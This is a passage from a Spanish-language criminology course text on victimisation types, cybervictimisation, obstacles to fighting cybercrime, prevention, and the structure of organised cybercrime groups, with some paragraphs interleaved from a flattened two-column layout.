estado de alerta y sobresaltadas, presentan dificultades de concentración en sus tareas
rutinarias, se muestran irritables y tienen problemas para conciliar el sueño. Por ello
tienden a sentirse desbordadas por los acontecimientos cotidianos y se auto convencen
de que ya nada está bajo su control. Un estado permanente de alerta lleva al agotamiento
porque, además de estar alterado el sueño, todos los sentidos de la víctima están atentos
sin descanso a los posibles peligros de la vida cotidiana.
Además, está el inconveniente de que la respuesta social ante el sufrimiento de la víctima
no siempre es solidaria lo que genera un mayor aislamiento de la víctima. La victimización
primaria, en resumen, se refiere a la propia vivencia personal del hecho por parte de la
víctima, son las iniciales consecuencias del delito es la acción y la consecuencia que
provoca la actuación del victimario sobre la víctima donde resulta lesionada la persona
desde el orden físico, psíquico, sexual o material.
Para Zaffaroni la victimización primaria se entiende como la derivada de haber padecido
un delito, que cuando va acompañado de violencia o experiencia personal con el autor
suele ir acompañado de efectos que se mantienen en el tiempo y pueden ser físicos,
psíquicos, económicos o de rechazo social.
VICTIMIZACIÓN SECUNDARIA
El término de victimización secundaria fue acuñado por Khüne para referirse a todas las
agresiones psíquicas que la víctima recibe en su relación con los profesionales de los
servicios sanitarios, policiales, o judiciales, así como los efectos del tratamiento informativo
del suceso por parte de los medios de comunicación.
La victimización secundaria deriva de la relación posterior establecida entre la víctima y
el sistema jurídico-penal o unos servicios sociales defectuosos. Es aquella que se produce

cuando la víctima decide interponer acto delictivo ya que en esta ocasión es
una denuncia y entra en contacto con el propio sistema, que en principio debe
las instituciones o profesionales que en cuidarla y protegerla, el que produce
principio deberían prestarle asistencia y el daño. Hemos de resaltar también la
apoyo, y que se deriva directamente del importancia que llega a tener los efectos
choque entre las expectativas previas de del tratamiento informativo del suceso
la víctima y la realidad institucional que por parte de los medios de comunicación
efectivamente se encuentra. y como esta exposición al público puede
llegar a afectar a la víctima.
En estas circunstancias la víctima
experimenta una doble herida: psíquica En el caso de la victimización secundaria,
(relacionada con el trauma vivido por haber la víctima según García Pablos de Molina:
sido víctima de un hecho delictivo) y social “sufre a menudo un severo impacto
(asociada a la incomprensión familiar o psicológico que añade al daño material o
social experimentada o a veces al apoyo físico en que el delito consiste. La vivencia
directo o indirecto al agresor). criminal se actualiza, revive y perpetúa en la
mente de la víctima (…), la sociedad misma,
La victimización secundaria constituye de otra parte, estigmatiza a la víctima lejos
el conjunto de costes personales que de responder con solidaridad y justicia,
tiene para la víctima de un delito su la etiqueta o marca, respondiendo con
intervención en el proceso penal. Incluye vacía compasión sino con desconfianza y
los efectos traumatizantes derivados de recelo”. (Garcia Pablos de Molina, 1993:86).
los interrogatorios policiales o judiciales, Así pues, podemos decir que el inicio del
de la reconstrucción de los hechos, la proceso penal que en principio tiene por
exploración médico-forense o el contacto objeto y está diseñado con la finalidad de
con el victimario o agresor en el juicio proteger los intereses de las víctimas, va a
oral, identificaciones de acusados, dar lugar también, a efectos perniciosos
lentitud y demora de los procesos etc. o indeseables para las propias víctimas
Esta victimización secundaria puede de la conducta delictiva que dio lugar a
resultar incluso más negativa que la la iniciación del correspondiente proceso
primaria, porque las víctimas en muchas penal para depurar responsabilidades.
ocasiones sienten que están perdiendo
el tiempo o malgastando su dinero, se Otra fuente de victimización secundaria
sienten incomprendidas debido a la alta son los medios de comunicación, que filtran
burocratización del sistema o simplemente la intimidad de la víctima al gran público y
son ignoradas. En algunos casos y en que, en ocasiones, buscan una justificación
relación a determinados delitos, las a lo ocurrido: en el caso de las víctimas de
víctimas pueden llegar a ser tratadas delitos violentos, ser un drogadicto, una
como “acusadas” y sufrir la falta de prostituta, un narcotraficante, una persona
tacto o la incredulidad de determinados de vida licenciosa, etc.
profesionales. A veces los interrogatorios de
la defensa están orientados a tergiversar
su intervención en los hechos que se
juzgan como por ejemplo el abogado que VICTIMIZACIÓN TERCIARIA
intenta hacer “confesar” a la víctima de
una agresión sexual que el acceso carnal Siguiendo a Josep M. Tamarit es el conjunto
se produjo con su consentimiento porque de costes de la penalización que recaen
no se resistió lo suficiente. sobre el propio autor de la conducta
delictiva o victimario, así como sobre
Es por ello que esta segunda victimización terceros (padres, parejas, hijos o amigos
posee la suficiente capacidad como para del delincuente). Nos referimos a los niveles
incrementar el daño ocasionado por el de ansiedad de los internos en los centros

penitenciarios, los efectos sobre los hijos de mujeres encarceladas que viven con sus
madres en prisión, el impacto del encarcelamiento sobre las personas que dependen
económica o emocionalmente del penado, etc.
Y es que con frecuencia la propia población penitenciaria puede considerarse como una
víctima del sistema procesal penal. A esta tipología de victimización también se le conoce
con la denominación de victimización del delincuente o el acusado, incluso algunos
hablan (en los casos en que se esté cumpliendo una condena a una pena privativa de
libertad) de victimización carcelaria.
Por tanto, se trata de la victimización que vive el delincuente por las circunstancias que
le llevaron a cometer la conducta delictiva, así como su paso por el establecimiento
penitenciario (en su caso) incluyéndose también las vivencias posteriores a la
excarcelación.
Así, podríamos analizar ahora que la madre de Sandra Palo, cuyo ejemplo proponíamos, se
victimiza en al menos dos de las tres categorías propuestas: es víctima personal (aunque
indirecta) de los agresores de su hija porque sufre el daño psicológico de su pérdida y el
impacto sobre sus relaciones sociales y, además, es víctima secundaria porque, tanto el
juicio como la liberación de “Rafita”, el menor de los agresores, han revivido en ella ese
dolor. Un dolor que, por cierto, se repetirá cuando el resto de los condenados terminen su
condena o logren un tercer grado.
Es dentro de la victimización terciaria donde debemos incluir el análisis y tratamiento de
los denominados “juicios paralelos” que se realizan en el ámbito de los procesos penales
y que se pueden considerar como una de las causas directas de la victimización terciaria.
Teniendo en cuenta que la publicidad de un proceso es la base y garantía de la
trasparencia del mismo y que se puede entender como elemento fundamental en
beneficio de las personas imputadas en un proceso penal, es evidente que en ocasiones,
tal y como se ha observado en los últimos años (por ejemplo en los casos mediáticos
de las niñas de Alcacer, Rocío Wanninkof y Sonia Carabantes, el asesino de Castellón
Joaquín Ferrándiz y otros muchos) da lugar a ciertas situaciones injustas ya que ponen
al imputado/s en el objetivo de la opinión pública y crean situaciones cuya reparación es
bastante complicada por no decir casi imposible.
La intervención de los medios de comunicación en los procesos penales da lugar a que
la información que se transmita respecto los mismos no sea completa, sea imparcial o
sesgada, lo cual, en lugar de ser favorable para la administración de justicia, se convierte
en todo lo contrario, y deja de ser útil a su finalidad pretendida y no solo eso, sino que
supone un importante obstáculo para conseguir la justicia que se busca con el proceso
penal.
Estas presiones que ejercen los medios de comunicación de masas no se dan
únicamente sobre la población en general sino también sobre las distintas personas que
intervienen en un determinado proceso tales como peritos, testigos, partes procesales,
e incluso puede dar lugar a que el propio órgano jurisdiccional (que no es ajeno a los
acontecimientos diarios y a la información que se genera en el día a día de la sociedad)
puede resultar en cierto modo “contaminado” por las opiniones o argumentos expuestos
en los medios de comunicación. Ni que decir tiene que, en los procesos del Jurado popular,
esta “contaminación mediática y social” puede llegar a límites insospechados. Por tanto,
desde esta perspectiva, los juicios paralelos van a suponer una penalización social, esto
es, una especie de pena anticipada que va a poner en entredicho y a comprometer el
derecho a la presunción de inocencia.

En torno a la cuestión suscitada aquí, conviene hacer mención de una sentencia del
Tribunal Constitucional, la sentencia 136/1999 en la que acogiendo la doctrina del Tribunal
Europeo de Derechos Humanos viene a declarar que “la Constitución brinda un cierto
grado de protección frente a los juicios paralelos en los medios de comunicación. Ello es
así, en primer lugar, por el riesgo de que la regular Administración de Justicia pueda sufrir
una pérdida de respeto y de que la función de los Tribunales pueda verse usurpada si se
incita al público a pseudo juicio en los medios de comunicación”.
VICTIMIZACIÓN INVISIBLE
Finalmente es imprescindible hablar de la “victimización no denunciada” o “victimización
invisible”. Esta victimización se produce en todos aquellos casos en los que una persona
concreta, aun habiendo sido lesionada en sus bienes o en sus derechos, opta por no
denunciar al autor material del delito.
Para referirnos a esta victimización nos basamos en la existencia de una elevada “cifra
negra” de conductas delictuales no denunciadas. Así pues, en países europeos y en
relación con delitos de carácter sexual, por ejemplo, las violaciones comportan un índice
de denuncia en torno al 45%, mientras que los abusos a niños, niñas y adolescentes, de
tan solo un 10%. (V. Garrido, P. Stangeland, S. Redondo.).
Estas víctimas sufren igualmente las consecuencias derivadas del delito, es más con el
agravante de que las sufren en silencio, a la espalda de la sociedad y en solitario la
mayor parte de los casos.
2.5. Revictimización
La revictimización es el sometimiento por parte de una persona a una nueva victimización
criminal. Se erige en concepto central a efectos de diseñar adecuadas estrategias
preventivas de criminalidad.
Los estudios sobre la revictimización nos sugieren que hay lugares o circunstancias
(puntos negros) y personas cuyos rasgos demográficos u hábitos presentan un alto
riesgo de victimización múltiple.
En la revictimización nos encontramos con dos enfoques diferentes:
• Por un lado, se mantiene la tesis de la vulnerabilidad que postula que una

previa victimización potencia la indefensión de ese sujeto lo que provoca
que no tenga respuestas adecuadas frente a un nuevo afrontamiento y
fomenta uno auto-percepción de impotencia, especialmente en el caso
de niños victimizados.
• Por otro lado, se defiende la tesis de la resilencia, de modo que una
experiencia previa de victimización proporciona una oportunidad de
aprendizaje para el desarrollo de estrategias de afrontamiento, de modo
que una persona que ya ha sido víctima de un delito se encuentra en
mejores condiciones para prevenir y afrontar una segunda experiencia
victimizante.

TRASCENDENCIA CRIMINOLÓGICA DE LA REVICTIMACIÓN
Lo que se pretende es lograr adecuadas estrategias preventivas de criminalidad. Estas se
han desplegado sobre modelos de actividad cotidiana y estilo de vida victimal.
La mayor parte de la doctrina (Herrera Moreno) entiende que el estudio de la revictimización
es importante y prioritario ya que puede suponer una reducción de la criminalidad en
base a unas comprobaciones empíricas, tales como:
• La revictimización se ajusta a porcentajes significativos de la criminalidad

global.
• Puede ser útil para una mejor identificación y aprehensión del infractor. La
revictimización permite predecir los modus operandi posteriores, es decir,
el área donde volverá a victimizar y qué personas serán el blanco de la
victimización.
• Las estrategias preventivas basadas en la revictimización posibilitan
invertir más eficazmente recursos estatales necesariamente limitados, ya
que hace factible identificar claramente lugares, propiedades e individuos
en especial riesgo.
2.6. La cibervíctima
Se puede definir la cibervictimización como la experiencia de violencia interpersonal en
línea. Esto es, un ataque o agresión a través de cualquier medio tecnológico que atenta
contra bienes jurídicos protegidos, como el honor (por ejemplo, agresiones verbales o
psicológicas, etc.), la libertad sexual (por ejemplo, la distribución inconsentida de cualquier
información íntima o sexual de la víctima), la libertad (por ejemplo, el control o vigilancia y
las amenazas), la dignidad (por ejemplo, ciberodio) o incluso el patrimonio (por ejemplo,
el fraude).
En un sentido más amplio, se incluyen también aquellas situaciones que no están tipificadas
expresamente como delito, como el cyberbullying, el acoso en línea, la sextorsión, etc.,
pero son potencialmente dañinas para sus víctimas.
El ciberespacio constituye un entorno virtual reconocidamente victimogenésico (Agustina,
2014; Herrera Moreno, 2006; Miró, 2012), que proporciona características diferenciales tanto
al hecho o situación victimizante como al proceso de victimización.
Las características propias de este contexto virtual (incorporeidad en las relaciones
en línea, simultaneidad de las experiencias, ausencia de límites geográficos y políticos,
accesibilidad 24/7, velocidad, reducción de inhibiciones y sensación de anonimato y
de distancia segura, escala, alcance, etc.) afectan, sin duda alguna, a los procesos de
victimización y desvictimización, especialmente en los aspectos siguientes:
• Perfeccionamiento de las estrategias empleadas por el agresor para

contactar, perseguir o vigilar a sus víctimas mediante aplicaciones y
redes sociales, y posibilidad de adoptar múltiples identidades para
hacerlo.
• Incremento de confianza en sí mismo gracias a la elevada probabilidad
de éxito y el refuerzo o aprobación social en línea por grupos o foros

con los mismos intereses o actitudes.
• Ausencia de percepción de riesgo por el anonimato, la minimización
de la autoridad y la ausencia de guardianes eficaces. También las
víctimas minimizan los riesgos que asumen por una sensación de
distancia segura y de protección ficticia.
• Efecto desinhibitorio que facilita las conductas delictivas a los agresores
motivados y elevan las probabilidades de que los usuarios incurran en
conductas de riesgo y acaben siendo cibervictimizados (por ejemplo,
ingresando material sensible en el ciberespacio, como imágenes
íntimas de sexting, interactuar con personas desconocidas en línea o
ingresar datos económicos y contraseñas).
• Incremento de víctimas potenciales por la implantación de internet en
la vida cotidiana de las personas y las instituciones públicas y privadas,
y la posibilidad de atacar simultáneamente a varias víctimas.
• Importancia del papel que juega la víctima en su propia victimización
por el ingreso, consciente o inconsciente, de todo tipo de información/
material sensible en el ciberespacio, la interacción con potenciales
agresores y las estrategias de autoprotección empleadas.
• Mayor velocidad e intensidad a la hora de ganarse la confianza de la
víctima y establecer relaciones.
• Inescapabilidad de las víctimas y ausencia de lugares seguros por la
accesibilidad 24/7, que aumenta la angustia e indefensión en la víctima.
• Posible publicidad y difusión del ataque, amplificando las consecuencias
negativas para la víctima y su entorno.
• Posible cronificación de la victimización, revictimización por el
mismo o distintos agresores y polivictimización, lo que incrementa su
vulnerabilidad dentro y fuera de la red.
• Dificultades en los procesos de desvictimización por la imposibilidad
de retirar o destruir muchas veces las evidencias digitales del abuso y
por la pérdida de control sobre los procesos de revelación.
• Minimización del daño o impacto por parte de los profesionales que
deben atender a las víctimas por el hecho de tratarse de ataques que
no contienen el elemento físico cara a cara.
• Mayor dificultad para asumir la propia victimización, ponerle nombre,
liberarse de la culpa y pedir ayuda o denunciar (naming, blaming,
claiming).
En definitiva, el ciberespacio constituye un reconocido espacio victimogénico cuya

arquitectura digital modifica las dinámicas de victimización y desvictimización, facilitando
la acción del ciberagresor motivado, incrementando la vulnerabilidad victimal de aquellos
que ingresan material sensible en la red sin las medidas de autoprotección necesarias y
dificultando su proceso de desvictimización o reajuste cognitivo y emocional.
La clasificación criminológica más aceptada es la propuesta por Miró (2012), según
la cual, en función del móvil o motivación criminal y los bienes atacados, se pueden
distinguir tres tipos básicos de cibercrimen: económico, político y social. Estos dan lugar a
tres categorías diferenciadas de cibervicictimización:
CIBERVICTIMIZACIÓN ECONÓMICA
La cibervictimización económica es la experiencia que se deriva del ataque contra bienes

jurídicos patrimoniales u otros como la intimidad o la seguridad de los sistemas, pero
siempre con el objetivo de obtener un beneficio económico, y la víctima puede ser una
persona o una entidad. Incluye la recepción de spam, infecciones por malware, spyware,
phishing, pharming o el hacking directo, entre otros, como ataques mediales que suelen
formar parte de una cadena de ataques que pueden terminar en una defraudación del
patrimonio de la víctima o en la utilización de su sistema para la comisión de otro tipo de
infracciones que menoscaben su patrimonio.
También suelen emplearse técnicas de ingeniería social, mediante las que se manipula
o engaña a las personas para que faciliten información o contraseñas que serán usadas
para conseguir el fin del delincuente (por ejemplo, en el fraude del CEO).
Algunas de las formas más conocidas de ciberfraude son los cometidos con tarjetas
de crédito, cheques, las estafas de inversión, el auction fraud, las estafas piramidales
realizadas a través de internet, las estafas de la lotería, así como los ataques de scam,
en los que se prometen cantidades importantes de dinero a cambio de pequeñas
transferencias relacionadas con ofertas de trabajo, premios u otros, aunque van
transformándose continuamente.
El abuso sexual infantil en línea puede considerarse tanto una forma de cibervictimización
social-sexual como económica, porque internet se utiliza tanto para acceder y acosar a
NNAs y producir este material, como para compartirlo y venderlo en comunidades o redes
de personas con intereses pedófilos en común (Beech, Elliott, Birgden y Findlater, 2008).
CIBERVICTIMIZACIÓN POLÍTICA
La cibervictimización política se deriva de los cibercrímenes que tienen un objetivo
ideológico o institucional e incluyen los delitos de odio, la ciberguerra y el hacktivismo
o ciberativismo político, mediante ataques de denegación de servicios contra páginas
web, etc. Estas conductas también pueden ser realizadas por grupos organizados con
fines políticos o religiosos que utilizan internet para difundir un determinado mensaje
político o como forma de ataque a un estado u organizaciones no gubernamentales
(Curran, Concannon y Mckeever, 2008). Las víctimas suelen ser colectivos o estados.
Los delitos de odio no corresponden propiamente a unas categorías jurídicas concretas,
sino que se refieren a un conjunto de conductas que, en ocasiones, apuntan a acciones
típicas nuevas, y en otras determinan la cualificación de conductas ya tipificadas en el
Código penal o en normas administrativas. Requieren que el acto constituya una infracción
penal y que sea producto de un prejuicio del autor hacia la víctima por pertenecer a un
colectivo vulnerable al odio, normalmente por motivos de raza, religión, ideología, género
u orientación sexual. Es decir, la víctima (o el objetivo) se elige intencionadamente por
el autor por su pertenencia (real o presunta) a un colectivo al que se desea transmitir
rechazo, hostilidad o intimidación.
CIBERVICTIMIZACIÓN SOCIAL
Deriva de los cibercrímenes sociales que afectan a bienes jurídicos personalísimos, como
la libertad, el honor, la indemnidad o la libertad sexual. Según Montiel, Carbonell y Pereda
(2016), se pueden distinguir dos grandes grupos:

• La victimización sexual en línea, que incluye situaciones con un
marcado componente sexual, como el ciberacoso sexual o sextorsión y
el online grooming a NNAs. En un sentido amplio, se puede definir como
la experiencia de algún tipo de presión a través de cualquier medio
tecnológico para obtener cooperación o contactos sexuales indeseados
(por ejemplo, compartir información sexual, enviar imágenes sexuales o
realizar alguna conducta sexual en contra de la voluntad de la víctima)
y/o la distribución inconsentida de cualquier información íntima o sexual
de la víctima (mensajes o imágenes) (Gámez-Guadix, Almendros, Borrajo
y Calvete, 2015).
• La victimización no sexual en línea, que no contiene necesariamente
elementos sexuales, e incluye el cyberbullying o ciberacoso entre iguales
y el cyberstalking o la violencia de pareja en línea. En un sentido amplio, se
puede definir como la experiencia a través de cualquier medio tecnológico
de humillaciones, vejaciones, insultos, persecución o control de manera
intencionada y reiterada.
3. Prevención, intervención y
persecución estratégica.
3.1. Introducción
La asociación tradicional entre espacio (físico) y distancia es la fuente del concepto de
“virtualidad” en el ciberespacio. No hay distancias en el espacio de comunicación creado
por Internet, pero hay espacio. Por lo tanto, el ciberespacio presupone una contracción
total del espacio (de las distancias) al mismo tiempo que amplía las oportunidades para
la interacción y comunicación humana.
A medida que el mundo se vuelve más pequeño y más interconectado, la estructura

social sin duda se ve afectada. A diferencia de la sociedad actual, donde las relaciones
se canalizan a través de redes, lo que favorece un desplazamiento de mucha mayor
información y comunicación, las sociedades tradicionales se caracterizaban por la
contigüidad, por las estrechas relaciones a nivel familiar, vecinal, local y supralocal.
Por lo tanto, las redes son el medio a través del cual se desarrollan nuevas comunidades
virtuales entre individuos que, aunque separados geográficamente, están conectados por
intereses e inquietudes comunes y, por lo tanto, se configuran como comunidades con
una lógica diferente en comparación con los de las comunidades físicas convencionales.
Las redes telemáticas que componen el ciberespacio confluyen virtualmente, pero

también terminales o sistemas informáticos que se encuentran ubicados en determinados
espacios terrestres, en determinados países nacionales con contextos sociales específicos
para facilitar el acceso a Internet, así como con distintos regímenes jurídicos, que pueden
afectar, por ejemplo. la prestación de servicios de identificación de titulares de direcciones
IP. Hace unas décadas, se requería una ubicación física fija para acceder a internet; sin
embargo, hoy, gracias a las redes Wi-Fi y, en particular, a la nueva tecnología de telefonía
móvil, es posible conectarse desde prácticamente cualquier lugar físico del planeta y en
cualquier lugar.
Sin embargo, la comunicación entre personas en el ciberespacio no tiene lugar en

el espacio físico donde se ubican los terminales. Lo más importante es que, si bien la
proximidad (en términos de distancia) entre el emisor y el receptor era necesaria para
la comunicación en el espacio físico, ya no se requiere en el ciberespacio porque ahora
pueden comunicarse simultáneamente (o por separado), y en el mismo ciber espacio,
pero en distintas ubicaciones geográficas (o separadas).
La reducción del espacio tiene dos efectos: primero, un aumento en el valor del tiempo y
segundo, una reducción del período de tiempo requerido para la interacción social. Ante la
ausencia de distancia y la aparición de un espacio virtual de intercomunicación instantánea,
también se reduce el tiempo necesario para la comunicación entre dos personas que se
encuentran separadas físicamente.
Como resultado, acciones que toman mucho tiempo en el espacio físico

nacional pueden ser realizadas inmediatamente en el ciberespacio, lo que tiene el efecto
de “acelerar la experiencia subjetiva del tiempo” porque las cosas suceden mucho
más rápido en línea que fuera de línea “el mundo real”.
Distancia – espacio físico Distancia – ciberespacio
d1 d2 d3
t1……………….tiempo……………….tn
à tiempo ßtn t1
Además, no es la única alteración que podríamos atribuir al “tiempo” en el ciberespacio. La

estructura comunicativa de esta nueva área de interacción social puede indicar que las
acciones con efectos instantáneos que eventualmente expiran tienen un funcionamiento
temporal diferente, es decir, efectos instantáneos que son perpetuamente perceptibles.
3.2. Dificultades para la lucha contra el cibercrimen

La lucha contra el cibercrimen es un desafío cada vez más complejo debido a la naturaleza
en constante evolución de las amenazas cibernéticas y a la creciente sofisticación de los
ciberdelincuentes. Algunas de las principales dificultades para combatir el cibercrimen
incluyen:
• El espacio-tiempo. La interacción directa y sincrónica entre agresor-víctima-

escena del delito-oportunidad delictiva de la delincuencia clásica no se da
aquí. En el mundo virtual hay una contracción total del espacio, que está 24
horas activo, y una expansión de la capacidad comunicativa (Miró, 2011). En el
ciberespacio las estructuras son volátiles y flexibles.
• El anonimato. Hay un seudoanonimato donde, realizando las pesquisas
correctas, se desenmascara al culpable que se oculta tras una falsa identidad,
y un anonimato casi total, donde emisor y receptor son irrastreables, como
puede ser la red TOR.
• La falta de legislación y transnacionalidad del cibercrimen. La respuesta jurídica
es mucho más lenta que la celeridad virtual y las fronteras físicas estatales
no existen en el ciberespacio, por lo que las legislaciones nacionales se ven
sobrepasadas.
• La diferente naturaleza de la evidencia digital, que es más fácilmente
modificable, duplicable y difícil de destruir (aunque parezca un contrasentido).
• Falta de conciencia: Muchas personas y organizaciones aún no comprenden
plenamente las amenazas cibernéticas y no toman las medidas adecuadas
para protegerse contra ellas.
• Falta de cooperación: Muchos países tienen leyes y regulaciones diferentes
en cuanto a la cibercriminalidad, lo que dificulta la cooperación internacional
entre las autoridades encargadas de hacer cumplir la ley.
Para abordar estas dificultades, es necesario un enfoque colaborativo y multifacético

que involucre a gobiernos, empresas, organizaciones y ciudadanos en la lucha contra el
cibercrimen. Esto puede incluir la creación de leyes y regulaciones internacionales más
coherentes, la inversión en recursos y tecnologías para combatir las amenazas cibernéticas
y una mayor conciencia y educación sobre la importancia de la ciberseguridad.
3.3. Prevención del ciberdelito

Ante los retos actuales de medios de control formal más institucionalizados, como las
fuerzas policiales, cuya función preventiva pudiera ser muy limitada en el ciberespacio,
la autodefensa sigue siendo, frente a estos crímenes, como quizás también frente a los
otros, la mejor forma de protección.
Así, igual que se ha demostrado que medidas de seguridad similares a las físicas como

alarmas, bloqueos únicos, cerraduras especiales etc. tienen éxito en la prevención de
delitos, existen otros sistemas de seguridad que tienen el mismo propósito en línea, como
el software antivirus, que pueden hacer lo mismo. Según estudios empíricos, estos sistemas
pueden ser muy efectivos para reducir el riesgo de ser víctima de ciberdelincuencia. Por
otro lado, ninguno de los elementos de protección antes mencionados son sistemas de
protección integrados o que operen independientemente del comportamiento del sujeto
al que están destinados a proteger; más bien, todos dependen de la propia víctima
para su funcionamiento y actualización. En todo caso, tal y como recoge F Miró Llinares,
son “guardianes capaces”, íntimamente ligados al elemento objetivo adecuado. Cohen
y Felson definieron a los “guardianes capaces” como personas que vivían cerca de la
víctima (vecinos, transeúntes no identificados, etc.), pero no forman parte de la propia
víctima, a diferencia del software que la víctima instala en su computadora. Debido a que
la víctima en el ciberespacio también es el objetivo, debe incluir a los “guardianes” que
pueden protegerla.
Es cierto que existen otros mecanismos de autoprotección que pueden llegar a ser
efectivos frente a los ciberdelitos además de los impuestos por la víctima. Otros
“guardianes capaces”, como la supervisión parental de la actividad online, la creación de
perfiles específicos que bloqueen el acceso a determinados sitios web, etc., pueden ser
de interés en los delitos cometidos contra niños, niñas y adolescentes. A esto se deben
sumar los futuros medios de control y protección institucional, ya que la seguridad de
internet requiere de múltiples esfuerzos institucionales y de los usuarios.
Para comprender y prevenir los delitos en el ciberespacio, es importante considerar tres
factores que otorgan a la víctima un significado especial.
La primera es que la potencial víctima del ciberdelito tiene la capacidad de dejar fuera
de la zona de riesgo aquello que no quiere que le afecte; ellos eligen desde el principio,
al incorporar ciertos bienes y esferas de su personalidad al ciberespacio, los márgenes
generales de la zona de riesgo a la que estarán sujetos. Dichos activos no pueden verse
afectados si ella no utiliza la banca electrónica o comunica sus contraseñas en línea,
ni tampoco si no ingresa al ciberespacio o desarrolla relaciones personales allí. Esto es
comparable a la idea de que si una víctima no sale, no puede ser víctima de robos afuera.
En segundo lugar, la víctima determina la probabilidad de contacto con un agresor
motivado por la agresión en el mismo tiempo y espacio o en otro diferente a través de sus
interacciones en el ciberespacio. Los estudios demuestran el papel crítico que juega el
comportamiento de la víctima en los casos de ciberdelincuencia. La víctima determina la
zona de riesgo a la que puede acceder un agresor con motivo. Podría argumentarse que
esto no es más que lo que sucede en el mundo físico, con un aumento en la probabilidad
de experimentar delitos al visitar lugares específicos, hacerlo en momentos específicos
del día, etc. Sin duda es comparable porque se basa en la idea de que el hecho delictivo
puede explicarse en parte por las actividades regulares de la víctima. La única distinción
es que la comunicación se lleva a cabo sin importar el espacio o el tiempo, y todos los
agentes son igualmente responsables de las acciones en Internet. Como resultado, una
vez que ha comenzado el comportamiento delictivo, a cuántos individuos afecta, ya sea
que afecte a uno, dos, cientos o miles, depende en gran medida de lo que haga cada
individuo.
Finalmente, y lo más importante, como ya se ha visto, la víctima será la única que podrá
contar con “guardianes capaces” para su propia defensa. El uso cotidiano de las TIC, en
particular la incorporación (o no) de sistemas digitales de autoprotección, será crucial a
la hora de ser víctima de un ciberdelito porque no existen distancias físicas ni guardianes

formales institucionalizados en este ámbito criminológico. Si además tenemos en cuenta
que el movimiento del ciberdelincuente hacia otros objetivos no solo es sencillo, sino que
muchas veces es instantáneo en Internet (por virus y otros factores), y que la dirección
del nuevo objeto del ataque estará marcada por la falta de mecanismos de defensa o
las vulnerabilidades del objetivo (según corresponda), parece obvio sacar la conclusión
de que la víctima está participando activamente en su proceso de autodefensa.
3.4. Organigrama de la delincuencia organizada

El organigrama de la delincuencia organizada informática más desarrollada es muy
simple para cualquier empresario tradicional. Es una combinación entre el modelo ideado
por Peter Drucker, creador de la configuración de la empresa moderna, y las prácticas
empresariales más novedosas, impartidas en las escuelas de negocios internacionales
(Goodman, 2015):
• Director ejecutivo (CEO): es la cabeza pensante y quien aporta el
capital inicial para ejecutarla. Tiene buenas conexiones y actúa como el
coordinador. Determina objetivos y metas para sus empleados y supervisa
la distribución de las ganancias.
• Director financiero: es el encargado de llevar la métrica del sindicato
de delincuentes, entre la que se encuentra también la cantidad de
malware que se ha vendido, el número de cuentas bancarias pirateadas
y la contabilidad. Mantiene una red sofisticada de contactos financieros
clandestinos para el blanqueo de dinero.
• Gerente de sistemas (CIO): encargado de mantener la infraestructura
informática. Gestiona los servidores informáticos blindados y no rastreables,
también los contratos con empresas de alojamiento web y proveedoras
de servicios en Internet fraudulentas para garantizar que su crimenware
no esté al alcance de las autoridades policiales internacionales. Mantiene
bases de datos de clientes y armadas de botnets.
• Director de mercadotecnia: es aquel que ayuda a redactar textos
publicitarios seductores y los aportan a redes de afiliación delictivas para
su distribución por la clandestinidad digital.
• Cuadros medios: se reclutan, normalmente, basándose en amistades de
larga duración y lealtades a mafias o de sangre. Son aquellos que han de
gestionar la mano de obra delincuente más extensa.
• Abejas obreras/infantería: serían los equivalentes a los camellos de barrio,
quienes distribuyen software malicioso mediante enlaces infectados,
archivos PDF y sitios web vulnerados. También se encargan de descifrar
códigos Captcha y ayudan a poner extractores de tarjetas de crédito en
los comercios al por menor y las placas de recubrimiento en los cajeros
automáticos.
• Departamento de investigación y desarrollo (I+D): se encuentra siempre
buscando los últimos fallos en el software, siendo capaz de gestionar un
código personalizado particularmente difícil para poder atacar objetivos
o sistemas específicos.
• Programadores, ingenieros y desarrolladores: son las mentes técnicas.
Crean sitios web y escriben el grueso de los códigos: crimeware,
ransomware y scareware. Son aquellos programadores de los exploits y el
malware que infectan y atacan los sistemas de información globales, bajo
un estricto control de calidad.
• Control de calidad: es la parte de la organización garante de que los shells o
intérpretes de órdenes criptográficas donde se esconde el malware de los
codificadores sean suficientemente buenos para pasar inadvertidos a los

sistemas de seguridad. Cotejan todo el crimenware con las definiciones de
antivirus conocidas para asegurarse de que su software malicioso no sea
detectado antes de ponerse en circulación. Herramientas como avcheck.
ru y Scan4You.net permiten a estos equipos examinar su posible detección
por parte de dieciocho de los programas antivirus más importantes
existentes actualmente. Como están completamente automatizados, se
actualizan constantemente.
• Afiliados: al igual que en las empresas legales, se paga a las personas que
colaboran en función del número de clientes que son capaces de conducir
hasta un minorista determinado. En Rusia se encuentran la mayoría de las
redes de afiliación y, a su vez, las mejores.
• Los partnerkas emiten sus programas a través de spam, foros, comentarios
en blogs, redes sociales y mensajes SMS. Crimen SA paga a sus afiliados
por clic o por instalación. En el más puro de los paroxismos, los capos de
la delincuencia advierten a sus afiliados en los sitios web clandestinos de
que «el uso de correo no deseado u otros métodos ilícitos de infección de
máquinas queda estrictamente prohibido» (Samosseiko, 2010).
• Asistencia técnica: que se presta tanto a sus empleados como a sus
afiliados.
• Director de recursos humanos: reclutar a las abejas/infantería como las
denominadas «mulas» que pueden, o no, saber que trabajan para Crimen
SA. Los anuncios para estos empleados prometen grandes ingresos,
flexibilidad horaria y trabajar desde casa. Aunque resulte paradójico, los
anuncios se publican en sitios web de empleos legítimos.
• Mulas para el blanqueo de dinero: son el rostro de los ciberdelitos, personas
que actúan con su verdadera identidad, siendo su vida útil muy breve
para la «empresa». La falta de estos rostros es el principal cuello de botella
en la actualidad.
Por todo lo anterior, estas investigaciones, según el tipo de delito cometido, hacen que sea
necesaria una especialización para moverse con facilidad en el mundo virtual, porque la
investigación se hará en muchas ocasiones detrás de un teclado e implicará una gran
ayuda de otros organismos, instituciones y empresas, nacionales y extranjeras.
Además, los informes periciales han de ser técnicos y, a la vez, accesibles para poder
demostrar los delitos en una dimensión tan específica. Es necesario, también, conocer
ciertos conceptos básicos para desarrollar la investigación.
4. Perfil delincuencial del

cibercrimen.
4.1. Los hackers
El hacker ha ido evolucionando a lo largo del tiempo: desde los denominados true
hackers, pioneros aficionados a la informática en los primeros días de la aparición de esta

tecnología en los años sesenta, pasando formas de conducta criminal existentes en
por los hardware hackers de los setenta, el ciberespacio.
que desarrollaron algunos de los equipos
y tecnologías más importantes, y también Junto al concepto amplio o genérico de
por los game hackers en los años ochenta hacker también podemos utilizar otro más
que desarrollaron aplicaciones de software estricto, preferido por la gran mayoría de
para juegos, y siendo la penúltima meta la hackers y otros expertos en Internet, que
